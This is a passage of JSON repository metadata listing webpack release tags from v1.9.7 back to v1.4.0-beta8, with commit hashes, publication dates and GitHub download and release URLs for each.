ag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0